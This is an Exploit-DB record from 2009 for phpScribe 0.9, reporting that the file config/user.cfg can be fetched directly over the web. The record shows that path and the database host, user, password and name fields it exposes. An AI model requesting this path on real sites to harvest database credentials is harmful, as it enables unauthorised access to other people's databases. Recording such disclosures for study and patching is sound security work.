phpScribe 0.9 user.cfg Remote Config Disclosure Vulnerability

2009-01-01T00:00:00
ID EDB-ID:7639
Type exploitdb
Reporter ahmadbady
Modified 2009-01-01T00:00:00

Description

phpScribe 0.9 (user.cfg) Remote Config Disclosure Vulnerability. Webapps exploit for php platform

                                        
                                            .......................................................................................................

/Remote Config File Disclosure/

script: phpscribe-0.9
   
***************************************************************************
download from:http://downloads.sourceforge.net/phpscribe/phpscribe-0.9.zip?modtime=1071100800&big_mirror=0
   
***************************************************************************
vul:

www.site.com/path/config/user.cfg
................................
$PS_USER_CFG['DATABASE_HOST']="";
$PS_USER_CFG['DATABASE_USER']="";
$PS_USER_CFG['DATABASE_PASS']="";
$PS_USER_CFG['DATABASE_BASE']="";
$PS_USER_CFG['DATABASE_TYPE']=""
...............................
-------------------------------------------------
-------------------------------------------------  
*************************************************

Author: ahmadbady 

*************************************************

# milw0rm.com [2009-01-01]